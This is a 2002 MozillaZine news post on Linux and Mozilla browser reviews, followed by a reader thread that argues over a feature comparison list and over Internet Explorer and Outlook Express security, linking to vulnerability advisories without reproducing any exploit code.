MozillaZine

Comparatively Speaking...

Monday July 1st, 2002

Linux Online recently compared the major Linux browsers, including the Mozilla-based trio of Mozilla 1.0, Netscape 6.2 and Galeon. Reviewer Michael J Jordan praises Mozilla's stability, tabbed browsing, rendering and customisation.

As mentioned by fondacio on our forums, the International Herald and Tribune took a look at Mozilla, Opera and NeoPlanet (note that the site doesn't seem to work in some builds of Mozilla). Reviewer Lee Dembart says that "Mozilla is impressive and has it all over Opera." He especially likes the ability to block pop-ups, tabbed browsing and pipelining.

UPDATE! tuxracer writes: "I've put up a browser comparison list, comparing various features that affect usability and W3C standards compliance. It compares Mozilla 1.0, Netcaptor 7.01, Internet Explorer 6.0 (Windows), and Internet Explorer 5.x (Mac)."


#1 IHT problem is not with Mozilla builds

by fondacio

Tuesday July 2nd, 2002 4:33 AM

The International Herald Tribune site has not been working correctly since the last site update, but the problem is not with Mozilla. The text of the articles doesn't show in IE either. I hope they fix it soon. By the way, the JavaScript menus on the site have been way faster on Mozilla than IE on my machine (PII-500) forever.

#3 Re: IHT problem is not with Mozilla builds

by AlexBishop <alex@mozillazine.org>

Tuesday July 2nd, 2002 8:47 AM

"The International Herald Tribune site has not been working correctly since the last site update, but the problem is not with Mozilla. The text of the articles doesn't show in IE either."

Hmm. The article doesn't display correctly for me using Mozilla 1.1 Alpha but it does work with IE6, Netscape 6.2 and Netscape Communicator 4.7 (but the page presented to Communicator is completely different to the others). This would suggest bad browser-sniffing but I've heard that the page does display correctly in Mozilla 1.0 (though I haven't tested this myself). I'll do some further investigating.

Alex

#4 Mozilla trunk -> looks ok

by TheK <kl@3dots.de>

Tuesday July 2nd, 2002 8:51 AM

what are you all missing?

#5 Oops... the problem was caused by WebWasher

by fondacio

Tuesday July 2nd, 2002 9:04 AM

The problem was that the actual text of the articles didn't show up anymore. As it turns out, the problem was neither with Mozilla nor with the IHT site. Yesterday I installed the most recent beta of WebWasher (<http://www.webwasher.com>), which enables you to always allow right mouse clicks. Unchecking this option solved the problem, both in Moz and IE. Guess I should have checked more thoroughly (not to mention that WebWasher is a bit redundant with the imageblocker and script features in Mozilla :-).

"the page presented to Communicator is completely different to the others"

So is the page presented to Opera. If you change Opera's user agent string, you get the same version that is presented to IE, Mozilla and Netscape 6+. However, it doesn't work correctly. I don't know if the site would work with Communicator (probably not), but I think they found an elegant solution to have both a modern site and still be able to present their content to users with older browsers. Incidentally, iht.com presented some problems between 0.9.5 and 0.9.9, crashing Mozilla immediately and disabling the back and forward buttons. Those bugs (88684 and 105619) were fixed some time ago.

#6 try a new profile

by morg

Tuesday July 2nd, 2002 11:12 AM

I was having the same trouble seeing IHT pages recently. I fixed it by using a new profile.

It's pretty cool that IHT would run a nice, friendly story about Mozilla. Earlier this year, the developers fixed a JavaScript bug that was crashing Mozilla every time the browser went to their site. That fix also got the site's sliding menu bar working on Mozilla, IIRC. Since then, it's been fine.

#2 Performance...

by TheK <kl@3dots.de>

Tuesday July 2nd, 2002 8:43 AM

as the Linux Online article says, the only downside on Mozilla is bad performance.

#7 tuxracer's comparison

by jhatax <manoj_r_mehta@yahoo.co.uk>

Wednesday July 3rd, 2002 4:44 PM

tuxracer's comparison of browser out of the box features is biased towards Mozilla. Though I am a big fan of Mozilla, I also believe in giving credit where it is due. IE has the following features over Moz:

1. Automatic form data capture. This is very intuitive and makes my life very easy when I do repetitive form filling
2. Guaranteed single form submission (Mozilla submits forms twice sometimes. There are open bugs on this issue!)
3. Some Performance issues still exist in Mozilla as regards DHTML and pages with large tables/data

Fact of the matter is, Mozilla on Windows might be the browser I use most, but I more or less expect IE to sometimes do what Mozilla can't.

#14 Re: tuxracer's comparison

by tuxracer

Thursday July 4th, 2002 2:29 PM

"1. Automatic form data capture. This is very intuitive and makes my life very easy when I do repetitive form filling"

I will add this.

"2. Guaranteed single form submission (Mozilla submits forms twice sometimes. There are open bugs on this issue!)"

I've never experienced this issue before.

"3. Some Performance issues still exist in Mozilla as regards DHTML and pages with large tables/data"

This is too vague. I'm not going to put generalized things such as "Good performance: Mozilla: No, IE: Yes" or "Better Interface: Mozilla: Yes, IE: No". Anything that isn't very specific is just bias, one way or the other.

I also think you are extremely exaggerating, and being too quick to judge to call the entire list biased towards Mozilla because I will not list things that I have not experienced for myself, and that are extremely vague (e.g. "Good performance", "Better Interface", "Cooler", etc...). I feel it is very ignorant to dismiss the entire list, and label it as "bias", over the three, supposed, issues you've mentioned.

#63 Re: Re: tuxracer's comparison

by TheK <kl@3dots.de>

Sunday July 7th, 2002 10:21 AM

the Form-Submission-Problems seem to have gone, at least I haven't seen it for long.

#8 Got that right!

by kristen

Wednesday July 3rd, 2002 6:14 PM

"tuxracer's comparison of browser out of the box features is biased towards Mozilla."

It most certainly is. Speed, stability, and memory consumption have been conveniently dismissed. No mention of Opera or the freeware clone of NetCaptor called 'Crazy Browser'. More importantly a good one called 'MyIE' made by someone in China called Changyou. Supports complete popup killing, tabs, bookmark groups, url shortcuts, url aliases, translation (configurable), url/ad blocking (configurable), customizable toolbars, etc, etc.. and weighs in at only 380K or so. Completely free, extremely fast, and uses IE for the rendering engine. No transparent PNG's? No biggy for it is coming soon (and plenty more) with IE7.

#9 Re: Got that right!

by eiseli

Wednesday July 3rd, 2002 8:04 PM

"Speed, stability, and memory consumption have been conveniently dismissed."

Hum... Do you call this "feature"? I call this performance. You can have a piece of software with tons of features and very bad performance, almost no features and good performance, and everything in between. So if tuxracer decided to compare the features, let him do this. If you want to compare performance, then please do so.

About the CrazyBrowser, MyIE and so on, I wonder if these are not so-called "add-ons". We might as well compare "Mozilla with Multizilla", "Mozilla with Optimoz", "Mozilla with..."

Anyway, I think a list of all possible features comparing to Mozilla is very important so that we can see where there is still some work to do. Let's hope people e-mail tuxracer and tell him: "I'm using browser xy and I love its feature yz", and it would be great if he added this into his list.

#10 Re: Re: Got that right!

by kristen

Wednesday July 3rd, 2002 8:36 PM

"Hum... Do you call this "feature"?"

I sure do. Although, expectation may be a better term.

"I wonder if these are not so-called "add-ons""

Nope. They are complete user-interfaces that incorporate IE for displaying web content. Of course, that doesn't stop one from calling a user interface an 'add-on' if they so desire to. Several of the items listed in the comparison are strictly UI 'centric', i.e., tabs, sidebar, etc.

"I think a list of all possible features comparing to Mozilla is very important"

Agreed! ;)

#12 Re: Re: Got that right!

by kristen

Wednesday July 3rd, 2002 11:33 PM

"then you should also include at least some of the Mozilla derivatives and Gecko-based browsers, take your pick from [takes a deep breath]: m/b, Chimera, NS6, NS7, Beonex, Galeon, K-Meleon, Aphrodite, BrowserG!"

hehe. Be my guest! ;)

#11 Got that wrong..

by michaelg <mike@vee.net>

Wednesday July 3rd, 2002 11:13 PM

"Speed, stability, and memory consumption have been conveniently dismissed."

Because it's a non-issue? Moz is sometimes faster, sometimes slower than IE. I've found it to be more stable than IE, as do a lot of people I know, but others will swear differently. And when you can give me a balanced way to make a comparison between the memory consumption of the two, let me know.

The problem with putting a comparison up between these sorts of attributes (they're not "features") is that they will always depend on the test system's configuration, hence it is impossible to get a comparison which is 100% fair and accurate.

"No mention of Opera or the freeware clone of NetCaptor called 'Crazy Browser'. More importantly a good one called 'MyIE' [...]"

Excluding Opera was a no-no, as was including NetCaptor. Crazy Browser and MyIE should not have been included because the comparison was mostly between non-derivative browsers.

But if you're going to include NetCaptor, Crazy Browser and MyIE, then you should also include at least some of the Mozilla derivatives and Gecko-based browsers, take your pick from [takes a deep breath]: m/b, Chimera, NS6, NS7, Beonex, Galeon, K-Meleon, Aphrodite, BrowserG! and probably a few more as well.

"No biggy for it is coming soon (and plenty more) with IE7."

[flame-on] Ohhh! Goodie! Is that the one they're including DRM? So you can't download the same HTML page twice without paying for it (twice!)? Are they going to put even *more* security holes in it? Find new, exciting ways to balkanize the Web and the Internet? Joy! Anyway, given how much slower IE6 is compared to IE5, I just /can't wait/ for 7. [flame-off]

/mike.

#13 Re: Got that wrong..

by kristen

Wednesday July 3rd, 2002 11:36 PM

"then you should also include at least some of the Mozilla derivatives and Gecko-based browsers, take your pick from [takes a deep breath]: m/b, Chimera, NS6, NS7, Beonex, Galeon, K-Meleon, Aphrodite, BrowserG!"

hehe. Be my guest! ;)

#26 Re: Got that wrong..

by michaelg <mike@vee.net>

Friday July 5th, 2002 8:08 PM

"hehe. Be my guest! ;)"

Too bad I haven't got a Windoze box or a Mac.. :)

/mike

#15 Re: tuxracer's comparison

by tuxracer

Thursday July 4th, 2002 2:36 PM

"It most certainly is. Speed, stability, and memory consumption have been conveniently dismissed."

I am not going to list things as vague as that. "Fast: Mozilla: Yes, IE: No" for example. or "Stable: Mozilla: Yes, IE: No". It is too vague, and bias no matter which is chosen. Memory consumption cannot be accurately measured with Internet Explorer due to integration with the operating system, with a mac it could be done, I would need someone to tell me how much memory it uses on the mac.

"No mention of Opera or the freeware clone of NetCaptor called 'Crazy Browser'. More importantly a good one called 'MyIE' made by someone in China called Changyou..."

I'm sorry, but I'm not going to sit here all day and compare every single browser in existence. IE is the most popular browser, and Netcaptor appears to be the most popular alternate interface for IE. If I'm mistaken, well then I'm sorry.

"No transparent PNG's? No biggy for it is coming soon (and plenty more) with IE7."

I'm not going to list features which are coming, or might be coming, in the next version of the browsers. I list what is currently available in the versions mentioned.

#18 Re: Got that right!

by arielb

Friday July 5th, 2002 1:52 AM

is better security also coming soon in IE7? It sure is annoying having to download security updates all the time (especially since Windows update still doesn't support pause/resume)

#19 Re: Re: Got that right!

by kristen

Friday July 5th, 2002 3:05 AM

"is better security also coming soon in IE7?"

I'm sure it will be even better.

"It sure is annoying having to download security updates all the time"

Then don't. What the 'IE security bashers' don't tell you is that the probability of your computer being compromised because of an 'IE security hole' is less than you getting killed (several times over) in a car wreck.

Lots of false info out there on the wild wild web (www).

#20 Lots of false info??

by niner

Friday July 5th, 2002 8:01 AM

Yeah if there were even half as many car accidents on LANParties like Nimda infections (via IE) there would be no more LANs just because all players died. How can you explain this if security holes are no problem?

#21 Re: Re: Re: Got that right!

by asa <asa@mozilla.org>

Friday July 5th, 2002 1:45 PM

Kristen, care to point us to a credible source for that claim? Are you counting virus infections as being compromised?

Even if your numbers are anything resembling reality that doesn't change the basic issue that while the risk may be low the consequences are very, very high. It also doesn't change the fact that there are fairly easy ways to dramatically reduce the chances that you will face those extreme consequences and failing to take those easy steps is both irresponsible and ultimately self-destructive.

Let's use your car wreck analogy. There were about 42,000 deaths in car wrecks last year <http://www.hwysafety.org/…_facts/state_by_state.pdf> and more than three million injuries <http://www-nrd.nhtsa.dot.…CSA/Content/Assess2K.html> . That's about 1 in 4000 drivers killed each year and about 1 in 55 injured. More than 40% of the deaths were the result of an alcohol related accident <http://www-nrd.nhtsa.dot.…pt/Alc00Chap2.htm#_VPID_8> . Doing something as simple as removing alcohol could prevent nearly 17,000 deaths and nearly one million injuries every year. Additionally, people not wearing seatbelts fare much worse in automobile accidents than those who do wear a restraint <http://www-nrd.nhtsa.dot.…CSA/Content/Assess2K.html> . "NHTSA research has shown that driver or a passenger cuts his or her risk of dying in a crash almost in half by buckling up" <http://www-nrd.nhtsa.dot.…CSA/Content/Assess2K.html> . So doing these two simple things, avoiding drunk driving and wearing a seatbelt, you can dramatically reduce the chances that you'll be killed or injured. With consequences that extreme I think it's a good idea to take the extra steps of not drinking and buckling up. So do the federal, state, and local governments.

While it's not death, having your personal, credit, banking, etc. data stolen or having your computer compromised by virii are grave consequences even if the chances of being victimized are slim. There are a couple of simple things that you can do to dramatically reduce your risk to these consequences. You can avoid insecure software like IE and Outlook and you can encrypt and otherwise secure as much of your data as possible. Doing these things is likely to have a dramatic effect in lowering your overall likelihood of being a victim <http://www.sophos.com/virusinfo/topten/> <http://jscript.dk/unpatched/> and does not require serious inconvenience (I'd argue that they are worth it even if they do cause serious inconvenience. Taking a taxi home or dealing with an uncomfortable seatbelt can be very inconvenient but most people recognize that they are worth it).

Telling people that they shouldn't download security updates because of the low probability of their being attacked, compromised or exploited is irresponsible. It's not that different from telling folks that driving drunk and not wearing a seatbelt is OK because the chance that it will cause death is not very high.

--Asa

#24 Re: Re: Re: Re: Got that right!

by kristen

Friday July 5th, 2002 6:24 PM

"Are you counting virus infections as being compromised?"

I'm glad you brought that up. You mean like Melissa, ILOVEYOU, W32.Klez and such? The ones that people in the forums here and mozilla newsgroups love to bring up to bash OE?

Those were rhetorical questions, of course. What you won't hear from these people is that those 'viruses' required people to execute an attachment in order to wreak havoc. Some were designed specifically to target OE users by using VBScript (a language only supported by IE/OE). Those attachments could just have easily been an executable (rather than an OS specific scripting language) that scanned, let's say, an NS4 user's address book and then proceeded to send itself to all of the NS4 user's 'buddies'. The attachment could even be more effective by including its own SMTP engine (such as W32.Klez) to bypass the user's email client altogether. If something requires a user to execute it in order to wreak havoc then game over. It is no longer a fault of any given operating system, email client, web browser, etc. Especially if the user in question has administrator level rights such as in WinNT/2K/XP, Linux, etc.

You, of course, won't hear that from the 'of the people, by the people, for the people' Mozilla crew. It is sad to see these kinds of things targeted at Windows users. It makes me wonder who the people are that are making these things, where they come from, and what operating system, web browser, etc. they spend their life evangelizing.

"Telling people that they shouldn't download security updates because of the low probability of their being attacked, compromised or exploited is irresponsible."

Agreed. I don't normally suggest to people that they don't download updates, however, arielb seemed to be irritated by having to download security updates for IE so I gave him/her some food for thought. I assert that arielb could install the original Windows98 with an entirely unpatched IE4 and browse to his/her heart's content without being 'compromised' in the least.

One thing that you could do, or anyone else here for that matter, is to take a break from the IE/OE/Windows security ranting and provide arielb some worthwhile links that he/she should not visit (including all of us 'in the dark' folks), lest they compromise his/her computer and severely degrade his/her way of life.

Of the people, by the people, for the people. Do you know what the amazing thing is? I'm sure that most of the regulars here don't even know what I'm talking about.

#27 Re: Re: Re: Re: Re: Got that right!

by asa <asa@mozilla.org>

Friday July 5th, 2002 9:58 PM

"those 'viruses' required people to execute an attachment in order to wreak havoc. Some were designed specifically to target OE users by using VBScript (a language only supported by IE/OE). Those attachments could just have easily been an executable (rather than an OS specific scripting language) "

But they weren't, were they? And I think you're confused. There have been and are Outlook virii which require only that the user open the message. Some did require executing and Outlook does everything it can to make that easy for a user to do. The point still remains that if you use that software you are going to be subject to that attack and if you don't use that software you won't be subject to that attack. The point is that Mozilla and other applications _are_not_ the target that Outlook is. Same goes for IE.

"It makes me wonder who the people are that are making these things, where they come from, and what operating system, web browser, etc. they spend their life evangelizing. "

If you really wonder why these attacks are targeted at windows then I'll help you out. Microsoft makes it easy. Targeting MS apps and OS is much easier than targeting Mac or Unix apps and operating systems. It's not a difficult concept. If I leave my door unlocked I am more likely to be burgled than if I don't. Microsoft has left the doors unlocked.

"I assert that arielb could install the original Windows98 with an entirely unpatched IE4 and browse to his/her heart's content without being 'compromised' in the least. "

Feel free to assert all you want but the truth is that the less secure you are the more likely you are to be compromised. You've got a 50% greater likelihood of dying in a car crash if you don't wear a seatbelt. It's not that complex a concept.

"take a break from the IE/OE/Windows security ranting and provide arielb some worthwhile links that he/she should not visit"

The two are orthogonal and I'd argue that arielb should feel safe reading any mail that arrives in the inbox and should feel free and safe to surf to any URL on the Web without worry that user data could be easily compromised. With Mozilla arielb _is_ safer reading any mail that arrives in the inbox and is safer surfing even malicious websites. That's the result of Mozilla's better security and privacy as well as the fact that Mozilla isn't the target that IE and Outlook are (both because it is a more difficult target and a less desirable target because of a smaller userbase).

One more thing, and if you respond at all please respond to at least this question. Why are you reading and posting at mozillaZine and can you explain how your comments fit in to this website's overarching topic, "Mozilla News and Advocacy"? Are you a Mozilla advocate? Are you providing Mozilla news?

--Asa

#28 Re: Re: Re: Re: Re: Re: Got that right!

by kristen

Friday July 5th, 2002 11:33 PM

"Feel free to assert all you want"

Thanks, I will. ;)

"The point is that Mozilla and other applications _are_not_ the target that Outlook is. Same goes for IE."

Of course not. If I wanted to do damage, wreak havoc, and cause problems with the highest degree of success, I certainly wouldn't bother making a program that read address book info from the latest mozilla nightly build. I'd make something that goes with what's the most popular and widespread at the time.

"With Mozilla arielb _is_ safer reading any mail that arrives in the inbox and is safer surfing even malicious websites."

How is that I wonder? In OE I can have scripting and attachments completely disabled. How exactly does Mozilla surpass this?

"That's the result of Mozilla's better security and privacy as well as the fact that Mozilla isn't the target that IE and Outlook are (both because it is a more difficult target and a less desirable target because of a smaller userbase)."

Small user base being the keyword. Like I said earlier, the email 'viri' that are so frequently brought up could just have easily been an *.exe file that a mozilla user could have chosen to execute. You're in quite a catch22 there: Too small for hackers to care about, yet at the same time evangelizing.

"One more thing, and if you respond at all please respond to at least this question. Why are you reading and posting at mozillaZine and can you explain how your comments fit in to this website's overarching topic, "Mozilla News and Advocacy"? Are you a Mozilla advocate? Are you providing Mozilla news?"

Hmmm. Earlier you told me to feel free to assert all I want. I must have misread that.

To answer your first question as to why I am reading and posting at Mozillazine, the answer is simple: Because I can. If this is a no-no then maybe a security upgrade is in order. ;)

Am I a Mozilla advocate? I'm not quite sure what you mean there. Do I have it installed on my own computer? Yes. Is it my primary browser? No. Do I preach it to other people? No.

Am I providing Mozilla news? Kinda. A different and practical point of view is more like it. If you're seeking to have a small community of people that hang around and agree with each other all day long then I suggest you do follow up with the earlier suggestion and get that 'Blind Mozilla Faith Only' security patch applied. ;)

Still waiting for those links. ;)

#42 Re: tuxracer's comparison

by tuxracer

Saturday July 6th, 2002 10:11 AM

"How is that I wonder? In OE I can have scripting and attachments completely disabled."

Makes no difference:

<http://www.malware.com/lookout.html> 'Silent delivery and installation of an executable on a target computer. No client input other than opening an email or newsgroup post or web site.' No attachments need to be opened, you simply need to read the e-mail or visit the website.

<http://sec.greymagic.com/adv/gm002-ie/> 'Automatically opening IE + Executing attachments'

And if you've installed OfficeXP you're vulnerable to <http://sec.greymagic.com/adv/gm005-ie/> 'Running script even with Scripting Disabled'

All the exploits mentioned above have no patch.

#44 Re: Re: tuxracer's comparison

by kristen

Saturday July 6th, 2002 10:46 AM

"Makes no difference:"

Sure it does.

1. (LINK) 'Silent delivery and installation of an executable on a target computer.' Scripting Required.

2. (LINK) 'Automatically opening IE + Executing attachments'. Scripting Required.

3. And if you've installed OfficeXP you're vulnerable to (LINK). Don't have that but ActiveX must be enabled.

"All the exploits mentioned above have no patch."

They do. OE6 is set by default to run in the restricted zone. The restricted zone is set by default to disabled scripting and disabled activex.

#50 Re: tuxracer's comparison

by tuxracer

Saturday July 6th, 2002 7:47 PM

"They do. OE6 is set by default to run in the restricted zone. The restricted zone is set by default to disabled scripting and disabled activex."

Uhm, actually no. It makes no difference at all, if you actually look at the <http://www.malware.com/lookout.html> you will see:

"Silent delivery and installation of an executable on a target computer. No client input other than opening an email or newsgroup post or web site. This can be accomplished with the default installation of...Outlook Express 6.0 and probably Outlook and Outlook 2002 and whatever other Outlook's there are. Default settings for Outlook Express and Outlook: restricted zone."

"In the case of Outlook Express default settings and Outlook default settings, where no scripting and no activex is allowed. We can achieve similar results substituting our method of file transference in the above, with a less than robust method. Simply put..."

No activex is required. No scripting is required. Works in Restricted zone.

Like I said, makes no difference at all. And I don't know about you, but I don't want to be at the mercy of every e-mail I read. But that's just me. Each to their own I guess.

#32 Follow up

by kristen

Saturday July 6th, 2002 5:21 AM

"Why are you reading and posting at mozillaZine and can you explain how your comments fit in to this website's overarching topic, "Mozilla News and Advocacy"? Are you a Mozilla advocate? Are you providing Mozilla news?"

I took the liberty to file a bug on this:

<http://bugzilla.mozilla.org/show_bug.cgi?id=156006>

#34 Re: Follow up

by bandido

Saturday July 6th, 2002 7:06 AM

What you have done is very childish and irresponsible. Why are you using bugzilla to report bogus bugs? Please, in the future, use bugzilla in a way that is productive and constructive. If you want to rant, use the mozilla public general newsgroups.

#35 Someone is having issues here

by fondacio

Saturday July 6th, 2002 7:11 AM

Even though I would agree that sometimes people in these forums tend to react in an oversensitive way to critical or even negative statements about Mozilla that do contain valid points, I think it is clear that someone has some serious issues here.

Kristen, it would help if you would make well-argued and clearly formulated points. It would also help if while you're doing this, you make a valid distinction between issues related to Mozilla and issues regarding Mozillazine and not waste your own and other people's time by filing obviously invalid bugs in Bugzilla. Right now, it just seems you have an issue with people who advocate Mozilla. It's no surprise that you can find those people here. But instead of giving them something to think about, you just behave like an adolescent who thinks it's fun to try and provoke and annoy others. I have been missing people like strauss and macpeep in these forums, but unfortunately you're not like them.

#37 Re: Someone is having issues here

by kristen

Saturday July 6th, 2002 9:43 AM

I'll respond to both of you at the same time since your replies are too lame (sorry, but it's true) to warrant individual responses.

"Why are you using bugzilla to report bogus bugs?" " and not waste your own and other people's time by filing obviously invalid bugs in Bugzilla."

You mean 'invalid bugs' like a bug filed complaining about a pop machine not working? Or how person A owes person B some money? Or of the several other non-bug related submissions to bugzilla most of which were made by @mozilla.org/@netscape.com people? Let me guess, in addition to reading and posting at mozillazine, a 'mozilla advocacy' badge is required for this also. If that's the case then the irony is that the bug I filed is, indeed, entirely valid. ;)

"Right now, it just seems you have an issue with people who advocate Mozilla"

That's funny. I was just thinking the exact opposite. It seems to me that some people have problems with those who don't advocate mozilla.

"But instead of giving them something to think about, you just behave like an adolescent who thinks it's fun to try and provoke and annoy others."

Hmmm. I don't think so. You may want to take a fresh read through this thread. ;)

#36 Well Well Well

by cartman <dawson3k@myrealbox.com>

Saturday July 6th, 2002 9:30 AM

Ohh dear Look at the news From <http://jscript.dk/unpatched/>

7 June 2002: There are currently 18 unpatched vulnerabilities.

This is what I call trustful computing! I think M$ wait for the bug number to come to #20 so that they can put up a cumulative patch online! LMAO!

#30 Re: Re: Re: Re: Re: Got that right!

by Dobbins

Saturday July 6th, 2002 3:03 AM

"Those were rhetorical questions, of course. What you won't hear from these people is that those 'viruses' required people to execute an attachment in order to wreak havoc. Some were designed specifically to target OE users by using VBScript (a language only supported by IE/OE). Those attachments could just have easily been an executable (rather than an OS specific scripting language) that scanned, let's say, an NS4 user's address book and then proceeded to send itself to all of the NS4 user's 'buddies'."

If the Virus was an exe or com file rather than a VirusBasic file most Windows users would remain clueless about it's nature because Microsoft's default setting is to hide file extensions making it easy for a Windows Virus writter to include a "checkout this picture" message in the message that goes with the attached Windows Virus. This is a known security flaw, yet MS still hides the extensions by default in XP.

"If something requires a user to execute it in order to wreak havoc then game over. It is no longer a fault of any given operating system, email client, web browser, etc. Especially if the user in question has administrator level rights such as in WinNT/2K/XP, Linux, etc. "

First, 'nix has a habit of warning its users about the dangers of using the root account for anything except routine maintenance. For example if you use Gnome you get a popup warning that you are accessing it as root and that you can damage the system in this mode. One of Linux's IRC clients actually has a popup telling you that you are accessing IRC as root and that it's "stupid" to do this.

You failed to mention Windows 9.x where EVERY user has admin access making ALL 9.x boxes a security hazard. Another example of MS's slipshod approach to system security. The real problem is MS just doesn't get security, the concept is alien to the company, (and it seems to many of its users).

Most of the Viruses and security exploits use KNOWN holes in Microsoft Programs. The ease of writing Office Viruses has been well known for years. Nothing was done to plug these holes, not a patch for older versions, and the problems remain in Office XP. Outlook is part of Office and Shares all of the Office flaws. IE has several new exploits crop up each month, yet MS refuses to even consider looking at its security model. IIS has one hole after another discovered.

Microsoft Exploits remain open for months after they are discovered and announced to the public. Security patches have undone earlier patches reopening old holes, or failing to correct a problem giving MS Users a false sense of security.

Sorry, using MS products is like driving around in a Pinto with Firestone tires and no seatbelts. You might drive for years without an accident, ignoring the hundreds of burned out Pintos littering the sides of the roads and on the news reports, but it sure as hell isn't as safe as junking the Pinto and getting a car with some safety features built into it.

#31 Re: Re: Re: Re: Re: Re: Got that right!

by kristen

Saturday July 6th, 2002 5:18 AM

Reply to this message

"If the Virus was an exe or com file rather than a VirusBasic file most Windows users would remain clueless about its nature because Microsoft's default setting is to hide file extensions making it easy for a Windows Virus writer to include a "checkout this picture" message in the message that goes with the attached Windows Virus. This is a known security flaw, yet MS still hides the extensions by default in XP."

I have absolutely no clue as to what you were trying to say there.

"First, 'nix has a habit of warning its users about the dangers of using the root account for anything except routine maintenance."

Of course. Your point being? A non-root user doesn't have an addressbook? Or a non-root user doesn't have information that is valuable to him/her that could be exploited by malicious code if the user ran such code in their own user process?

"You failed to mention Windows 9.x where EVERY user has admin access making ALL 9.x boxes a security hazard."

Oh please. You failed to mention older versions of Sendmail and Apache, too. And a whole slew of others. ;)

Bottom line is that most of this security talk is a bunch of hogwash. A lame FUD tactic really and nothing more. If not for me, then for at least others (especially regular mozilla users who have to use IE from time to time for whatever reason): Provide us with a list of malicious sites that we should avoid going to. Given all of the constant and relentless bashes I have read regarding IE's security in the past couple of weeks here and in the mozilla/netscape newsgroups, it should be quite easy.

Of the people, by the people, for the people, remember? In otherwords, put your money where your mouth is. With a little bit of luck you can make a web page that will take control of my PC and send all of my quicken data to you. ;)

#41 Re: Re: Re: Re: Re: Re: Re: Got that right!

by Dobbins

Saturday July 6th, 2002 10:10 AM

Reply to this message

"I have absolutely no clue as to what you were trying to say there."

Windows is capable of showing that that file someone sent you is named "picture.vbs" rather than simply showing a file named "picture" in your outlook window. By default showing the extension is turned off making it more likely someone will click on it. You can warn people not to click on .vbs or .exe or .com but since Windows hides the extensions in the default settings they don't know they are clicking on the type of file you warned them about. MS knows the default settings cause this problem, but they consider Windows users to be dummies that would be confused by seeing extensions.

"Of course. Your point being? A non-root user doesn't have an addressbook? Or a non-root user doesn't have information that is valuable to him/her that could be exploited by malicious code if the user ran such code in their own user process?"

A Regular user is incapable of running a file that will damage the entire system. A file he runs can't change the files that are the equivalent of Windows registry. It can't Format the Hard drive. It can't delete or modify files belonging to other users. All he can do is run a file that will expose the data in his home directory to exploit, NOT the entire system.

"Oh please. You failed to mention older versions of Sendmail and Apache, too. And a whole slew of others. ;)"

The only security flaw in Apache in years was patched in a matter of a couple of days. IIS flaws remain unpatched months after discovery. Sendmail is patched in a matter of days if not hours when a flaw is discovered while Microsoft's mail program has holes remaining open for months. Really savvy 'nix admins can use Qmail, which has NEVER had a security exploit, instead of Sendmail. Microsoft users don't have the option of choice. If the maintainers of Apache and Sendmail were as slow as Microsoft is in patching their programs I can take the source code and either fix it myself or pay some one to fix it, an option that doesn't exist with Microsoft's closed source products. Microsoft users can only wait hoping that MS will get around to fixing the flaw, and that if they do bother fixing it it will be released as a patch rather than as part of the next version requiring upgrade fees.

As for your list strawman, there is no list of sites waiting to exploit your system, just like there isn't a list of burglars that live near you. The absence of a list doesn't mean there are no malicious sites or no burglars in your area. The Security model is to assume that there are sites and burglars that will take advantage of you if you fail to take the proper precautions.

"especially regular mozilla users who have to use IE from time to time for whatever reason"

IE doesn't run on my system for two reasons. 1. It doesn't work on Linux 2. Even if it did I don't install software with 18 known security problems on my system.

Windows users can do the same thing I do, simply not use IE. Much to Microsoft's dismay it is still possible to surf the web without using their software.

#49 Re: Re: Re: Re: Re: Re: Re: Re: Got that right!

by kristen

Saturday July 6th, 2002 7:45 PM

Reply to this message

"By default showing the extension is turned off making it more likely someone will click on it."

I don't think so. I'll tell you what makes it likely that a user will execute an attachment: My dad receiving an email from me with an attachment named "iloveyou.exe" that reads: I love you. ;)

"A Regular user is incapable of running a file that will damage the entire system"

No kidding. Is this your response to: "Especially if the user in question has administrator level rights such as in WinNT/2K/XP, Linux, etc." Because whatever point you're trying to make seems kind of futile.

"As for your list strawman"

Ok. I'll add that to the list of troll, juvenile, irresponsible, yaddah, yaddah, yaddah. Now I am a strawman. ;)

"The absence of a list doesn't mean there are no malicious sites or no burglars in your area"

Here's a novel concept: The absence of a list certainly doesn't mean there is either. In your evangelizing of a product, browsing security is repeatedly, in untold degrees, brought up. I'm simply saying can you show me what you mean? Can you provide me with, at least, a few sites that exploit these obscure security holes reported by microsoft, gray magic, or whoever else?

Like I said to arielb, the chances that he/she comes across a web page that violates his/her security is less than getting killed in a car wreck several times over. This may come as a blow to some but oh well. ;)

#51 Re: Re: Re: Re: Re: Re: Re: Re: Re: Got that right

by Dobbins

Saturday July 6th, 2002 8:34 PM

Reply to this message

Fine Kristen, live in your fantasy world where Uncle Bill will take care of your every computing need, ignore all the Microsoft Viruses, the tardy response (if any) to security flaws. It's always amusing to watch microserfs make fools of themselves.

#62 Re: Re: Re: Re: Re: Re: Re: Re: Re: Got that right

by SubtleRebel <mark@ky.net>

Sunday July 7th, 2002 10:08 AM

Reply to this message

> "As for your list strawman"
>
> Ok. I'll add that to the list of troll, juvenile, irresponsible, yaddah, yaddah, yaddah. Now I am a strawman. ;)

No one called you a strawman. Apparently you are not familiar with the term; perhaps you should look it up.

If you do understand the term, then your response does qualify you as a troll.

#40 Re: tuxracer's comparison

by tuxracer

Saturday July 6th, 2002 10:01 AM

Reply to this message

"Those were rhetorical questions, of course. What you won't hear from these people is that those 'viruses' required people to execute an attachment in order to wreak havoc. Some were designed specifically to target OE users by using VBScript (a language only supported by IE/OE). Those attachments could just have easily been an executable (rather than an OS specific scripting language) that scanned, lets say, an NS4 users address book and then proceeded to send itself to all of the NS4 users 'buddies'. The attachment could even be more effective by including its own SMTP engine (such as W32.Klez) to bypass the users email client all together. If something requires a user to execute it in order to wreak havoc then game over. It is no longer a fault of any given operating system, email client, web browser, etc. Especially if the user in question has administrator level rights such as in WinNT/2K/XP, Linux, etc."

I would like to take this time to point you to one of the many unpatched IE/OE exploits: <http://www.malware.com/lookout.html>

'Silent delivery and installation of an executable on a target computer. No client input other than opening an email or newsgroup post or web site. This can be accomplished with the default installation of Internet Explorer 6.0, Outlook Express 6.0 and probably Outlook and Outlook 2002 and whatever other Outlook's there are. Default settings for Outlook Express and Outlook: restricted zone.'

#29 Not my experience

by jsebrech

Saturday July 6th, 2002 3:02 AM

Reply to this message

I'm quite lazy, and since I'm a linux user myself I don't always run windows update on time for the windows machines I administer for other people.

Net result: 2 infections in 2 years. Both through IE. And that doesn't include the 3 or so infections in my circle of family and friends on machines that I don't administer.

Car accidents in that time: 0

